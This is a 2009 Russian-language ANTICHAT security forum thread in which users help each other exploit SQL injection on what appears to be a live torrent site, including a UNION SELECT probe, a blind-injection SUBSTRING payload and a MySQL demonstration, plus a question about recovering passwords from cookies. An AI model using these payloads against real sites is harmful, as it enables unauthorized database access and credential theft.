ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6191  
Старый 26.03.2009, 17:39
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Цитата:
Сообщение от PaCo  
Ну я бы так не сказал все зависит от настроек сервака, ты забываешь еще и про pgsql
Хорошо, пусть это будет PostgreSQL. =)
Ну помочь то сможешь? Там мускул стоит мне кажется, т.к. 3306 открыт.Или я ошибаюсь и все бд используют этот порт?
 
Ответить с цитированием

  #6192  
Старый 26.03.2009, 18:21
Seshh
Новичок
Регистрация: 04.03.2009
Сообщений: 23
Провел на форуме:
59175

Репутация: 0
По умолчанию

Подскажите может есть всётаки способ расшифровать КУКИ и узнать пароль скрыты в них ???
 
Ответить с цитированием

  #6193  
Старый 26.03.2009, 18:28
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

есть, если в куках есть пароль и знать алгоритм шифрования пароля
 
Ответить с цитированием

  #6194  
Старый 26.03.2009, 18:32
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от mailbrush  
А ведь это реально каракули -
PHP код:
<?php 
$q 
'ООтправить';
$s mb_detect_encoding($q);//Определяем кодировку
$q iconv($s'CP1251//TRANSLIT'$q);//Декодируем
echo $s "\r\n";
echo 
$q "\r\n";
?>
 
Ответить с цитированием

  #6195  
Старый 26.03.2009, 20:08
Gray_Wolf
Постоянный
Регистрация: 07.03.2009
Сообщений: 357
Провел на форуме:
1284900

Репутация: 399
По умолчанию

Ввожу:
.../srt.php?id=-1+union+select+1,2,3--+
Получаю:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LEFT JOIN categories on torrents.category = categories.id LEFT JOIN sub_categori' at line 22

Есть идеи как строится запрос и в каком направлении нужно раскручивать?
 
Ответить с цитированием

  #6196  
Старый 26.03.2009, 20:11
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

когда видишь такое - LEFT JOIN - только слепая скуля, т.к. кол-во колонок не подберешь из-за участия в данном запросе не только одной таблицы.

Либо blind, либо ищи другую ссылку на этом же сайте, где запросы попроще
 
Ответить с цитированием

  #6197  
Старый 26.03.2009, 20:18
Gray_Wolf
Постоянный
Регистрация: 07.03.2009
Сообщений: 357
Провел на форуме:
1284900

Репутация: 399
По умолчанию

Со слепыми ещё не сталкивался, но буду пробовать.
(искать другую не вариант, т.к. даже для этой потребовались права модератора)
Есть мыски куда копать?
 
Ответить с цитированием

  #6198  
Старый 26.03.2009, 20:21
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

2 Gray_Wolf

.../srt.php?id=1+AND+(SUBSTRING((select+version()),1,1 ))>33..127
 
Ответить с цитированием

  #6199  
Старый 26.03.2009, 20:33
Gray_Wolf
Постоянный
Регистрация: 07.03.2009
Сообщений: 357
Провел на форуме:
1284900

Репутация: 399
По умолчанию

Цитата:
Сообщение от Gorev  
2 Gray_Wolf

.../srt.php?id=1+AND+(SUBSTRING((select+version()),1,1 ))>33..127
Спасибо, думаю дальше смогу сам раскрутить.
 
Ответить с цитированием

  #6200  
Старый 26.03.2009, 20:41
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

Цитата:
когда видишь такое - LEFT JOIN - только слепая скуля, т.к. кол-во колонок не подберешь из-за участия в данном запросе не только одной таблицы.
заблуждаешься
Код:
mysql> SELECT 1,2 FROM mysql.user LEFT JOIN mysql.db ON(1=1) UNION SELECT 3,4;
+---+---+
| 1 | 2 |
+---+---+
| 1 | 2 |
| 3 | 4 |
+---+---+
2 rows in set (0.00 sec)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ